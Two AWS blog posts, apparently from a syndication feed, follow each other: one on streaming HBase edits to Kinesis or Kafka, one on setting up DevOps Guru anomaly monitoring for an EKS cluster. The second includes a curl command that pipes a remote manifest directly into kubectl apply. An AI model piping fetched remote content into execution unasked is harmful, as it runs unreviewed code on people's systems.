Stream Apache HBase edits for real-time analytics

Post Syndicated from Amir Shenavandeh original https://aws.amazon.com/blogs/big-data/stream-apache-hbase-edits-for-real-time-analytics/

Apache HBase is a non-relational database. To use its data, applications normally have to query tables and repeatedly poll them for changes. In this post, we introduce a mechanism to stream Apache HBase edits into streaming services such as Apache Kafka or Amazon Kinesis Data Streams. In this approach, changes to data are pushed and queued into a streaming platform such as Kafka or Kinesis Data Streams for real-time processing, using a custom Apache HBase replication endpoint.

We start with a brief technical background on HBase replication and review a use case in which we store IoT sensor data into an HBase table and enrich rows using periodic batch jobs. We demonstrate how this solution enables you to enrich the records in real time and in a serverless way using AWS Lambda functions.

Common scenarios and use cases of this solution are as follows:

  • Auditing data, triggers, and anomaly detection using Lambda
  • Shipping WALEdits via Kinesis Data Streams to Amazon OpenSearch Service (successor to Amazon Elasticsearch Service) to index records asynchronously
  • Triggers on Apache HBase bulk loads
  • Processing streamed data using Apache Spark Streaming, Apache Flink, or Amazon Kinesis Data Analytics
  • HBase edits or change data capture (CDC) replication into other storage platforms, such as Amazon Simple Storage Service (Amazon S3), Amazon Relational Database Service (Amazon RDS), and Amazon DynamoDB
  • Incremental HBase migration by replaying the edits from any point in time, based on configured retention in Kafka or Kinesis Data Streams

This post progresses into some common use cases you might encounter, along with their design options and solutions. We review and expand on these scenarios in separate sections, in addition to the considerations and limits in our application designs.

Introduction to HBase replication

At a very high level, HBase replication works by replaying transactions from a source cluster on a destination cluster. It does this by shipping WALEdits, the Write-Ahead Log (WAL) entries generated on the RegionServers of the source cluster, to the destination cluster and replaying them there. In HBase, every data mutation such as a PUT or DELETE is written to the MemStore of its region and appended to a WAL file as a WALEdit. Each WALEdit represents a transaction and can carry multiple write operations on a row. Because the MemStore is an in-memory structure, if a RegionServer fails, the lost data can be replayed and restored from the WAL files. Writing to the WAL is optional, and some operations can request to bypass the WAL for quicker writes; for example, records imported through a bulk load aren’t recorded in the WAL.
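
To make the WAL behavior concrete, the following minimal sketch uses the standard HBase client API to issue one put that goes through the WAL (and is therefore visible to replication) and one that explicitly skips it. The table name and column family are hypothetical placeholders.

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Durability;
import org.apache.hadoop.hbase.client.Put;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.util.Bytes;

public class WalDurabilityExample {
    public static void main(String[] args) throws Exception {
        Configuration conf = HBaseConfiguration.create();
        try (Connection connection = ConnectionFactory.createConnection(conf);
             Table table = connection.getTable(TableName.valueOf("sensor"))) {

            // Normal put: appended to the WAL as part of a WALEdit, so replication sees it.
            Put replicated = new Put(Bytes.toBytes("vehicle-001"));
            replicated.addColumn(Bytes.toBytes("d"), Bytes.toBytes("speed"), Bytes.toBytes("92"));
            table.put(replicated);

            // WAL-bypassing put: faster, but invisible to WAL-based replication.
            Put skipped = new Put(Bytes.toBytes("vehicle-002"));
            skipped.addColumn(Bytes.toBytes("d"), Bytes.toBytes("speed"), Bytes.toBytes("57"));
            skipped.setDurability(Durability.SKIP_WAL);
            table.put(skipped);
        }
    }
}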

HBase replication is based on transferring WALEdits to the destination cluster and replaying them so any operation that bypasses WAL isn’t replicated.

When setting up replication in HBase, you select a ReplicationEndpoint implementation in the replication configuration when creating a peer, and an instance of that ReplicationEndpoint runs as a thread on every RegionServer. In HBase, the replication endpoint is pluggable, which allows flexibility in how WALEdits are shipped, including to different versions of HBase. You can also use this to build replication endpoints that send edits to entirely different platforms and environments. For more information about setting up replication, see Cluster Replication.
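
As an illustration of that pluggability, the following sketch registers a replication peer backed by a custom endpoint class through the HBase Admin API. It assumes an HBase 2.x client; the endpoint class name and peer ID are placeholders, not the classes from our repository.

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.client.Admin;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.replication.ReplicationPeerConfig;

public class AddStreamingPeer {
    public static void main(String[] args) throws Exception {
        Configuration conf = HBaseConfiguration.create();
        try (Connection connection = ConnectionFactory.createConnection(conf);
             Admin admin = connection.getAdmin()) {
            // Point the peer at a custom endpoint class instead of another HBase cluster.
            ReplicationPeerConfig peerConfig = ReplicationPeerConfig.newBuilder()
                .setReplicationEndpointImpl("com.example.replication.StreamingReplicationEndpoint") // placeholder class
                .build();
            admin.addReplicationPeer("streaming_peer", peerConfig);
        }
    }
}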

HBase bulk load replication (HBASE-13153)

In HBase, bulk loading is a method to directly import HFiles or Store files into RegionServers. This avoids the normal write path and WALEdits. As a result, far less CPU and network capacity is used when importing large volumes of data into HBase tables.

You can also use HBase bulk loads to recover data when an error or outage causes the cluster to lose track of regions and Store files.

Because bulk loads skip WAL creation, the newly loaded records aren’t replicated to the secondary cluster. The HBASE-13153 enhancement addresses this by representing a bulk load as a bulk load event that carries the location of the imported files. You can activate this by setting hbase.replication.bulkload.enabled to true and, as a prerequisite, setting hbase.replication.cluster.id to a unique value.

Custom streaming replication endpoint

We can use HBase’s pluggable endpoints to stream records into platforms such as Kinesis Data Streams or Kafka. Transferred records can be consumed by Lambda functions, processed by a Spark Streaming application or Apache Flink on Amazon EMR, Kinesis Data Analytics, or any other big data platform.

In this post, we demonstrate an implementation of a custom replication endpoint that allows replicating WALEdits in Kinesis Data Streams or Kafka topics.

In our example, we extend the BaseReplicationEndpoint abstract class, which implements the ReplicationEndpoint interface.

The main method to implement and override is the replicate method. Each time it’s called, this method receives a batch of WAL entries and blocks until all of those records have been replicated to the destination.
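
Each call to replicate hands the endpoint a ReplicationEndpoint.ReplicateContext whose entries are the WAL entries to ship. The following helper is a simplified sketch, not the repository's code, of the kind of flattening an endpoint might perform on those entries before serializing them for a stream producer.

import java.util.ArrayList;
import java.util.List;
import org.apache.hadoop.hbase.Cell;
import org.apache.hadoop.hbase.CellUtil;
import org.apache.hadoop.hbase.util.Bytes;
import org.apache.hadoop.hbase.wal.WAL;

public final class WalEntryFormatter {
    // Flatten each WALEdit's cells into simple strings; a real endpoint would serialize
    // these (for example as JSON or Avro) and push them to Kinesis Data Streams or Kafka.
    public static List<String> format(List<WAL.Entry> entries) {
        List<String> out = new ArrayList<>();
        for (WAL.Entry entry : entries) {
            for (Cell cell : entry.getEdit().getCells()) {
                out.add(Bytes.toStringBinary(CellUtil.cloneRow(cell)) + ":"
                        + Bytes.toStringBinary(CellUtil.cloneFamily(cell)) + ":"
                        + Bytes.toStringBinary(CellUtil.cloneQualifier(cell)) + "="
                        + Bytes.toStringBinary(CellUtil.cloneValue(cell)));
            }
        }
        return out;
    }
}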

For our implementation and configuration options, see our GitHub repository.

Use case: Enrich records in real time

We now use the custom streaming replication endpoint implementation to stream HBase edits to Kinesis Data Streams.

The provided AWS CloudFormation template demonstrates how to set up an EMR cluster that replicates to either Kinesis Data Streams or Apache Kafka, and how to consume the replicated records with a Lambda function that enriches the data asynchronously, in real time. In our sample project, we launch an EMR cluster with an HBase database. A sample IoT traffic generator application runs as a step in the cluster and puts records, each containing a registration number and an instantaneous speed, into a local HBase table. Using our custom HBase replication endpoint, the records are replicated in real time into a Kinesis data stream or Kafka topic, depending on the option selected at launch. When the step starts putting records into the stream, a Lambda function is provisioned and begins consuming records from the beginning of the stream until it catches up. For each record, the function calculates a score based on how far the speed deviates from the minimum and maximum speed limits in the use case, and persists the result as a score qualifier in a separate column family that is outside the replication scope of the source table, by running HBase puts on the RowKey.
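
For reference, a consumer of this kind can be as small as the following Lambda handler sketch. It assumes, purely for illustration, that each replicated record was serialized as "<rowKey>,<speed>" and that the speed limits are 40 and 120; the actual sample project defines its own payload format and scoring formula.

import com.amazonaws.services.lambda.runtime.Context;
import com.amazonaws.services.lambda.runtime.RequestHandler;
import com.amazonaws.services.lambda.runtime.events.KinesisEvent;
import java.nio.charset.StandardCharsets;

public class SpeedScoreHandler implements RequestHandler<KinesisEvent, Void> {
    // Hypothetical speed limits for the scoring formula.
    private static final double MIN_SPEED = 40.0;
    private static final double MAX_SPEED = 120.0;

    @Override
    public Void handleRequest(KinesisEvent event, Context context) {
        for (KinesisEvent.KinesisEventRecord record : event.getRecords()) {
            // The Lambda runtime has already base64-decoded the payload into this ByteBuffer.
            String payload = StandardCharsets.UTF_8.decode(record.getKinesis().getData()).toString();
            String[] parts = payload.split(",");                 // assumed "<rowKey>,<speed>" layout
            double speed = Double.parseDouble(parts[1]);
            double score = Math.max(0.0, Math.min(1.0, (speed - MIN_SPEED) / (MAX_SPEED - MIN_SPEED)));
            context.getLogger().log("RowKey=" + parts[0] + " score=" + score);
            // A real consumer would now issue an HBase Put on this RowKey, writing the score
            // into a column family that is excluded from the replication scope.
        }
        return null;
    }
}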

The following diagram illustrates this architecture.

To launch our sample environment, you can use our template on GitHub.

The template creates a VPC, public and private subnets, Lambda functions to consume records and prepare the environment, an EMR cluster with HBase, and a Kinesis data stream or an Amazon Managed Streaming for Apache Kafka (Amazon MSK) cluster depending on the selected parameters when launching the stack.

Architectural design patterns

Traditionally, Apache HBase tables are considered as data stores, where consumers get or scan the records from tables. It’s very common in modern databases to react to database logs or CDC for real-time use cases and triggers. With our streaming HBase replication endpoint, we can project table changes into message delivery systems like Kinesis Data Streams or Apache Kafka.

We can trigger Lambda functions to consume messages from Apache Kafka or Kinesis Data Streams for a serverless design, or use the wider Amazon Kinesis ecosystem, such as Kinesis Data Analytics or Amazon Kinesis Data Firehose, for delivery into Amazon S3. You could also deliver the records into Amazon OpenSearch Service.

A wide range of consumer ecosystems, such as Apache Spark, AWS Glue, and Apache Flink, is available to consume from Kafka and Kinesis Data Streams.

Let’s review a few other common use cases.

Index HBase rows

Apache HBase rows are retrievable by RowKey. Writing a row into HBase with the same RowKey overwrites the row or creates a new version of it. To retrieve a row, it needs to be fetched by its RowKey; if the RowKey is unknown, a range of rows needs to be scanned.

In some use cases, scanning the table for a specific qualifier or value is expensive. Instead, we can asynchronously index our rows in a parallel system like Elasticsearch, and applications can use that index to find the RowKey. Without this solution, a periodic job has to scan the table and write the rows into an indexing service like Elasticsearch to hydrate the index, or the producing application has to write to both HBase and Elasticsearch directly, which adds overhead to the producer.
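
The following sketch shows the cost difference the index avoids, assuming an HBase 2.x client and a hypothetical sensor table with column family d: a Get by RowKey is a single lookup, whereas finding rows by value requires a filtered scan across the table.

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.CompareOperator;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Get;
import org.apache.hadoop.hbase.client.Result;
import org.apache.hadoop.hbase.client.ResultScanner;
import org.apache.hadoop.hbase.client.Scan;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.filter.SingleColumnValueFilter;
import org.apache.hadoop.hbase.util.Bytes;

public class LookupVersusScan {
    public static void main(String[] args) throws Exception {
        Configuration conf = HBaseConfiguration.create();
        try (Connection connection = ConnectionFactory.createConnection(conf);
             Table table = connection.getTable(TableName.valueOf("sensor"))) {

            // Cheap: a direct lookup when the RowKey is known, for example from the external index.
            Result byKey = table.get(new Get(Bytes.toBytes("vehicle-001")));
            System.out.println("Columns found by Get: " + byKey.size());

            // Expensive: without the RowKey, a filtered scan still reads across the table.
            Scan scan = new Scan();
            scan.setFilter(new SingleColumnValueFilter(
                Bytes.toBytes("d"), Bytes.toBytes("speed"),
                CompareOperator.EQUAL, Bytes.toBytes("92")));
            try (ResultScanner scanner = table.getScanner(scan)) {
                for (Result row : scanner) {
                    System.out.println(Bytes.toStringBinary(row.getRow()));
                }
            }
        }
    }
}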

Enrich and audit data

A very common use case for HBase streaming endpoints is enriching data and storing the enriched records in a data store, such as Amazon S3 or an RDS database. In this scenario, a custom HBase replication endpoint streams the records into a message distribution system such as Apache Kafka or Kinesis Data Streams. Records can be serialized using the AWS Glue Schema Registry for schema validation. A consumer on the other end of the stream reads the records, enriches them, and validates them against a machine learning model in Amazon SageMaker for anomaly detection. The consumer persists the records in Amazon S3 and potentially triggers an alert using Amazon Simple Notification Service (Amazon SNS). Stored data on Amazon S3 can be further processed on Amazon EMR, or we can create a dashboard on Amazon QuickSight, using Amazon Athena for queries.

The following diagram illustrates our architecture.

Store and archive data lineage

Apache HBase comes with the snapshot feature. You can freeze the state of tables into snapshots and export them to any distributed file system like HDFS or Amazon S3. Recovering snapshots restores the entire table to the snapshot point.

Apache HBase also supports versioning of data. You can configure column families to keep multiple versions of each cell, and versioning is based on timestamps by default.
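
For example, keeping several timestamped versions is a per-column-family setting. The following sketch applies it with the HBase 2.x Admin API; the table and family names are placeholders.

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.client.Admin;
import org.apache.hadoop.hbase.client.ColumnFamilyDescriptor;
import org.apache.hadoop.hbase.client.ColumnFamilyDescriptorBuilder;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.util.Bytes;

public class EnableVersions {
    public static void main(String[] args) throws Exception {
        Configuration conf = HBaseConfiguration.create();
        try (Connection connection = ConnectionFactory.createConnection(conf);
             Admin admin = connection.getAdmin()) {
            // Keep up to five timestamped versions of each cell in column family "d".
            ColumnFamilyDescriptor family = ColumnFamilyDescriptorBuilder
                .newBuilder(Bytes.toBytes("d"))
                .setMaxVersions(5)
                .build();
            admin.modifyColumnFamily(TableName.valueOf("sensor"), family);
        }
    }
}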

In contrast, when using this approach to stream records into Kafka or Kinesis Data Streams, records are retained inside the stream, and you can replay any portion of the retained period. Restoring a snapshot only recovers data up to the snapshot point; records written afterward aren’t present.

In Kinesis Data Streams, by default records of a stream are accessible for up to 24 hours from the time they are added to the stream. This limit can be increased to up to 7 days by enabling extended data retention, or up to 365 days by enabling long-term data retention. See Quotas and Limits for more information.

In Apache Kafka, record retention has virtually no limits based on available resources and disk space configured on the Kafka cluster, and can be configured by setting log.retention.

Trigger on HBase bulk load

The HBase bulk load feature uses a MapReduce job to output table data in HBase’s internal data format, and then directly loads the generated Store files into the running cluster. Bulk loading uses less CPU and network capacity than loading via the HBase API, because it bypasses the WAL in the write path, which also means the records aren’t seen by replication. However, since HBASE-13153, you can configure HBase to replicate a meta record as an indication of a bulk load event.

A Lambda function processing replicated WALEdits can listen to this event to trigger actions, such as automatically refreshing a read replica HBase cluster on Amazon S3 whenever a bulk load happens. The following diagram illustrates this workflow.

Considerations for replication into Kinesis Data Streams

Kinesis Data Streams is a massively scalable and durable real-time data streaming service. Kinesis Data Streams can continuously capture gigabytes of data per second from hundreds of thousands of sources with very low latency. Kinesis is fully managed and runs your streaming applications without requiring you to manage any infrastructure. It’s durable, because records are synchronously replicated across three Availability Zones, and you can increase data retention to 365 days.

When considering Kinesis Data Streams for any solution, it’s important to consider service limits. For instance, as of this writing, the maximum size of the data payload of a record before base64-encoding is up to 1 MB, so we must make sure the records or serialized WALEdits remain within the Kinesis record size limit. To be more efficient, you can enable the hbase.replication.compression-enabled attribute to GZIP compress the records before sending them to the configured stream sink.
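
Independent of that configuration flag, GZIP compression of a serialized batch is plain Java. A minimal helper illustrating the idea:

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.util.zip.GZIPOutputStream;

public final class PayloadCompressor {
    // GZIP-compress a serialized WALEdit batch so it stays within the 1 MB Kinesis record limit.
    public static byte[] gzip(byte[] payload) throws IOException {
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        try (GZIPOutputStream gzip = new GZIPOutputStream(buffer)) {
            gzip.write(payload);
        }
        return buffer.toByteArray();
    }
}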

Kinesis Data Streams retains the order of records within each shard as they arrive, and records can be read and processed in the same order. However, this sample custom replication endpoint uses a random partition key so that the records are evenly distributed between the shards. We could instead use a hash function to generate the partition key when putting records into the stream, for example based on the Region ID, so that all the WALEdits from the same Region land in the same shard and consumers can assume Region locality per shard.

For delivering records in KinesisSinkImplemetation, we use the Amazon Kinesis Producer Library (KPL) to put records into Kinesis data streams. The KPL simplifies producer application development and helps achieve high write throughput to a Kinesis data stream. You can use the KPL synchronously or asynchronously; we suggest the asynchronous interface for its higher performance unless there is a specific reason to use synchronous behavior. The KPL is highly configurable, has retry logic built in, and can aggregate records for maximum throughput. In KinesisSinkImplemetation, records are replicated to the stream asynchronously by default. You can switch to synchronous mode by setting hbase.replication.kinesis.syncputs to true, and enable record aggregation by setting hbase.replication.kinesis.aggregation-enabled to true.

The KPL can incur an additional processing delay because it buffers records before sending them to the stream, for up to a user-configurable RecordMaxBufferedTime. Larger values of RecordMaxBufferedTime result in higher packing efficiency and better performance. However, applications that can’t tolerate this additional delay may need to use the AWS SDK directly.
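
A minimal KPL producer sketch tying these settings together follows. The Region, stream name, and partition key are placeholders; the sample project drives the equivalent settings through its hbase.replication.kinesis.* properties.

import com.amazonaws.services.kinesis.producer.KinesisProducer;
import com.amazonaws.services.kinesis.producer.KinesisProducerConfiguration;
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;

public class KplSketch {
    public static void main(String[] args) {
        KinesisProducerConfiguration config = new KinesisProducerConfiguration()
            .setRegion("us-east-1")                 // placeholder: adjust to your Region
            .setRecordMaxBufferedTime(100)          // ms to buffer before sending; higher packs better
            .setAggregationEnabled(true);           // combine small records into one Kinesis record
        KinesisProducer producer = new KinesisProducer(config);

        // A Region-derived partition key keeps WALEdits from the same HBase Region in one shard.
        String partitionKey = "hbase-region-0123abcd";   // placeholder for an encoded region name
        ByteBuffer payload = ByteBuffer.wrap("rowkey-1,92".getBytes(StandardCharsets.UTF_8));
        producer.addUserRecord("hbase-edits-stream", partitionKey, payload); // placeholder stream name

        producer.flushSync();   // block until buffered records are delivered
        producer.destroy();
    }
}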

Kinesis Data Streams and the Kinesis family are fully managed and integrate easily with the rest of the AWS ecosystem, including services such as the AWS Glue Schema Registry and Lambda, with minimal development effort. We recommend considering Kinesis Data Streams for low-latency, real-time use cases on AWS.

Considerations for replication into Apache Kafka

Apache Kafka is a high-throughput, scalable, and highly available open-source distributed event streaming platform used by thousands of companies for high-performance data pipelines, streaming analytics, data integration, and mission-critical applications.

AWS offers Amazon MSK as a fully managed Kafka service. Amazon MSK provides the control plane operations and runs open-source versions of Apache Kafka. Existing applications, tooling, and plugins from partners and the Apache Kafka community are supported without requiring changes to application code.

You can configure this sample project for Apache Kafka brokers directly or just point towards an Amazon MSK ARN for replication.

Although there is virtually no hard limit on message size in Kafka, the maximum message size defaults to 1 MB, so we must make sure the records, or serialized WALEdits, remain within the maximum message size configured for our topics.

The Kafka producer tries to batch records together whenever possible to limit the number of requests for more efficiency. This is configurable by setting batch.size, linger.ms, and delivery.timeout.ms.

In Kafka, topics are partitioned, and partitions are distributed between different Kafka brokers. This distributed placement allows for load balancing of consumers and producers. When a new event is published to a topic, it’s appended to one of the topic’s partitions. Events with the same event key are written to the same partition, and Kafka guarantees that any consumer of a given topic partition reads that partition’s events in exactly the same order as they were written. KafkaSinkImplementation uses a random partition key to distribute the messages evenly between the partitions. The key could instead be derived from a hash function, for example based on the Region ID, if the order of the WALEdits or record locality is important to the consumers.
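
A minimal producer sketch showing both the batching settings and a keyed record follows; the broker address, topic, and key are placeholders.

import java.util.Properties;
import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.ProducerConfig;
import org.apache.kafka.clients.producer.ProducerRecord;
import org.apache.kafka.common.serialization.StringSerializer;

public class KafkaSketch {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put(ProducerConfig.BOOTSTRAP_SERVERS_CONFIG, "broker1:9092");   // placeholder broker
        props.put(ProducerConfig.KEY_SERIALIZER_CLASS_CONFIG, StringSerializer.class.getName());
        props.put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG, StringSerializer.class.getName());
        props.put(ProducerConfig.BATCH_SIZE_CONFIG, 65536);        // bytes per in-flight batch
        props.put(ProducerConfig.LINGER_MS_CONFIG, 20);            // wait up to 20 ms to fill a batch
        props.put(ProducerConfig.DELIVERY_TIMEOUT_MS_CONFIG, 120000);

        try (KafkaProducer<String, String> producer = new KafkaProducer<>(props)) {
            // Keying by the HBase Region keeps edits from one Region ordered within a partition.
            String key = "hbase-region-0123abcd";                  // placeholder for an encoded region name
            producer.send(new ProducerRecord<>("hbase-edits", key, "rowkey-1,92"));
            producer.flush();
        }
    }
}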

Semantic guarantees

Like any streaming application, it’s important to consider the semantic guarantees offered by the producer of messages, how delivery to the message queue is acknowledged or failed, and how checkpointing is handled on the consumer’s side. Based on our use cases, we need to consider the following:

  • At most once delivery – Messages are never delivered more than once, and there is a chance of losing messages
  • At least once delivery – Messages can be delivered more than once, with no loss of messages
  • Exactly once delivery – Every message is delivered only once, and there is no loss of messages

After changes are persisted in the WAL and in the MemStore, the replicate method in ReplicationEndpoint is called to replicate a collection of WAL entries and returns a Boolean (true/false) value. If the returned value is true, the entries are considered successfully replicated by HBase and the replicate method is called for the next batch of WAL entries. Depending on configuration, both the KPL and the Kafka producer might buffer records for longer when configured for asynchronous writes. Failures can cause loss of entries, retries, and duplicate delivery of records to the stream, which could be detrimental for either synchronous or asynchronous message delivery.
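
One common way to get at-least-once behavior is to send the whole batch, flush, and wait for every acknowledgment before reporting success, so that HBase re-ships the batch on any failure. A sketch of that pattern with the Kafka producer API (illustrative, not the repository's code):

import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.Future;
import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.ProducerRecord;
import org.apache.kafka.clients.producer.RecordMetadata;

public final class AtLeastOnceSender {
    // Returns true only if every record in the batch was acknowledged by the brokers,
    // mirroring the contract of ReplicationEndpoint.replicate: returning false makes
    // HBase re-ship the same batch, so duplicates are possible but loss is not.
    public static boolean sendBatch(KafkaProducer<String, String> producer,
                                    String topic, List<String> serializedEdits) {
        List<Future<RecordMetadata>> acks = new ArrayList<>();
        for (String edit : serializedEdits) {
            acks.add(producer.send(new ProducerRecord<>(topic, edit)));
        }
        producer.flush();
        try {
            for (Future<RecordMetadata> ack : acks) {
                ack.get();   // throws if the record was not delivered
            }
            return true;
        } catch (Exception e) {
            return false;    // HBase will call replicate again with the same entries
        }
    }
}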

If your operations aren’t idempotent, you can checkpoint or check for unique sequence numbers on the consumer side. For simple HBase record replication, RowKey operations are idempotent, and they carry a timestamp and a sequence ID.

Summary

Replication of HBase WALEdits into streams is a powerful tool that you can use in multiple use cases and in combination with other AWS services. You can create practical solutions to further process records in real time, audit the data, detect anomalies, set triggers on ingested data, or archive data in streams to be replayed on other HBase databases or storage services from a point in time. This post outlined some common use cases and solutions, along with some best practices when implementing your custom HBase streaming replication endpoints.

Review, clone, and try our HBase replication endpoint implementation from our GitHub repository and launch our sample CloudFormation template.

We’d like to learn about your use cases. If you have questions or suggestions, please leave a comment.


About the Authors

Amir Shenavandeh is a Senior Hadoop systems engineer and Amazon EMR subject matter expert at Amazon Web Services. He helps customers with architectural guidance and optimization. He leverages his experience to help people bring their ideas to life, focusing on distributed processing and big data architectures.

Maryam Tavakoli is a Cloud Engineer and Amazon OpenSearch subject matter expert at Amazon Web Services. She helps customers optimize their analytics and streaming workloads and is passionate about solving complex problems with a simple user experience that empowers customers to be more productive.

Automate Container Anomaly Monitoring of Amazon Elastic Kubernetes Service Clusters with Amazon DevOps Guru

Post Syndicated from Rahul Sharad Gaikwad original https://aws.amazon.com/blogs/devops/automate-container-anomaly-monitoring-of-amazon-elastic-kubernetes-service-clusters-with-amazon-devops-guru/

Observability in a container-centric environment presents new challenges for operators due to the increasing number of abstractions and supporting infrastructure. In many cases, organizations can have hundreds of clusters and thousands of services, tasks, and pods running concurrently. This post demonstrates new features in Amazon DevOps Guru that help simplify and expand the capabilities of the operator: grouping anomalies by metric and container cluster to improve context and simplify access, and support for additional Amazon CloudWatch Container Insights metrics. As an example of these capabilities in action, Amazon DevOps Guru can now identify anomalies in CPU, memory, or networking within Amazon Elastic Kubernetes Service (Amazon EKS), notifying operators and letting them more easily navigate to the affected cluster to examine the collected data.

Amazon DevOps Guru offers a fully managed AIOps platform service that lets developers and operators improve application availability and resolve operational issues faster. It minimizes manual effort by leveraging machine learning (ML) powered recommendations. Its ML models take advantage of the expertise of AWS in operating highly available applications for the world’s largest ecommerce business for over 20 years. DevOps Guru automatically detects operational issues, predicts impending resource exhaustion, details likely causes, and recommends remediation actions.

Solution Overview

In this post, we will demonstrate the new Amazon DevOps Guru features around cluster grouping and additionally supported Amazon EKS metrics. To demonstrate these features, we will show you how to create a Kubernetes cluster, instrument the cluster using AWS Distro for OpenTelemetry, and then configure Amazon DevOps Guru to automate anomaly detection of EKS metrics. A previous blog provides detail on the AWS Distro for OpenTelemetry collector that is employed here.

Prerequisites

EKS Cluster Creation

We employ the eksctl CLI tool to create an Amazon EKS cluster. Using eksctl, you can provide details on the command line or specify a manifest file. The following manifest creates a single managed node on Amazon Elastic Compute Cloud (Amazon EC2); the cluster is constrained to the specified Region via the metadata/region entry and to specific Availability Zones via the managedNodeGroups/availabilityZones entry. By default, this creates a new VPC with eight subnets.

# An example of ClusterConfig object using Managed Nodes
---
    apiVersion: eksctl.io/v1alpha5
    kind: ClusterConfig

    metadata:
      name: devopsguru-eks-cluster
      region: <SPECIFY_REGION_HERE>
      version: "1.21"

    availabilityZones: ["<FIRST_AZ>","<SECOND_AZ>"]
    managedNodeGroups:
      - name: managed-ng-private
        privateNetworking: true
        instanceType: t3.medium
        minSize: 1
        desiredCapacity: 1
        maxSize: 6
        availabilityZones: ["<SPECIFY_AVAILABILITY_ZONE(S)_HERE>"]
        volumeSize: 20
        labels: {role: worker}
        tags:
          nodegroup-role: worker
    cloudWatch:
      clusterLogging:
        enableTypes:
          - "api"
  • To create an Amazon EKS cluster using eksctl and a manifest file, we use eksctl create as shown below. Note that this step will take 10 – 15 minutes to establish the cluster.
$ eksctl create cluster -f devopsguru-managed-node.yaml
2021-10-13 10:44:53 [i] eksctl version 0.69.0
…
2021-10-13 11:04:42 [✔] all EKS cluster resources for "devopsguru-eks-cluster" have been created
2021-10-13 11:04:44 [i] nodegroup "managed-ng-private" has 1 node(s)
2021-10-13 11:04:44 [i] node "<ip>.<region>.compute.internal" is ready
2021-10-13 11:04:44 [i] waiting for at least 1 node(s) to become ready in "managed-ng-private"
2021-10-13 11:04:44 [i] nodegroup "managed-ng-private" has 1 node(s)
2021-10-13 11:04:44 [i] node "<ip>.<region>.compute.internal" is ready
2021-10-13 11:04:47 [i] kubectl command should work with "/Users/<user>/.kube/config"
  • Once this is complete, you can use kubectl, the Kubernetes CLI, to access the managed nodes that are running.
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
<ip>.<region>.compute.internal Ready <none> 76m v1.21.4-eks-033ce7e

AWS Distro for OpenTelemetry Collector Installation

We will use AWS Distro for OpenTelemetry Collector to extract metrics from a pod running in Amazon EKS. This will collect metrics within the Kubernetes cluster and surface them to Amazon CloudWatch. We start by defining a policy to allow access. The following information comes from the post here.

Attach the CloudWatchAgentServerPolicy IAM policy to the worker node

  • Open the Amazon EC2 console.
  • Select one of the worker node instances, and choose the IAM role in the description.
  • On the IAM role page, choose Attach policies.
  • In the list of policies, select the check box next to CloudWatchAgentServerPolicy. You can use the search box to find this policy.
  • Choose Attach policies.

Deploy AWS OpenTelemetry Collector on Amazon EKS

Next, you will deploy the AWS Distro for OpenTelemetry using a GitHub hosted manifest.

  • Deploy the artifact to the Amazon EKS cluster using the following command:
$ curl https://raw.githubusercontent.com/aws-observability/aws-otel-collector/main/deployment-template/eks/otel-container-insights-infra.yaml | kubectl apply -f -
  • View the resources in the aws-otel-eks namespace.
$ kubectl get pods -l name=aws-otel-eks-ci -n aws-otel-eks
NAME READY STATUS RESTARTS AGE
aws-otel-eks-ci-jdf2w 1/1 Running 0 107m

View Container Insight Metrics in Amazon CloudWatch

Access Amazon CloudWatch and select Metrics, All metrics to view the published metrics. Under Custom Namespaces, ContainerInsights is selectable. Under this, one can view metrics at the cluster, node, pod, namespace, and service granularity. The following example shows pod level metrics of CPU:

The AWS Console with Amazon Cloudwatch Container Insights Pod Level CPU Utilization.

Amazon Simple Notification Service

Amazon DevOps Guru must be allowed to publish to Amazon SNS so that it can send notification events. During the setup process, an Amazon SNS topic is created, and the following resource policy is applied:

{
    "Sid": "DevOpsGuru-added-SNS-topic-permissions",
    "Effect": "Allow",
    "Principal": {
        "Service": "region-id.devops-guru.amazonaws.com"
    },
    "Action": "sns:Publish",
    "Resource": "arn:aws:sns:region-id:topic-owner-account-id:my-topic-name",
    "Condition" : {
      "StringEquals" : {
        "AWS:SourceArn": "arn:aws:devops-guru:region-id:topic-owner-account-id:channel/devops-guru-channel-id",
        "AWS:SourceAccount": "topic-owner-account-id"
    }
  }
}

Amazon DevOps Guru

Amazon DevOps Guru can now be used to monitor the Amazon EKS cluster and managed node group. To do this, open Amazon DevOps Guru and select Get started, as shown in the following figure.

The Amazon DevOps Guru service via the AWS Console.

Once selected, the Get started console displays, letting you specify the IAM role for DevOps Guru to access the appropriate resources.

The Get started dialog for Amazon DevOps Guru including instructions on how the service operates, IAM Role Permissions and Amazon DevOps Guru analysis coverage.

Under Amazon DevOps Guru analysis coverage, select Choose later. This lets us specify the CloudFormation stacks to monitor. Select Create a new SNS topic and provide a name; this topic collects notifications and allows subscribers to be notified. Select Enable when complete.

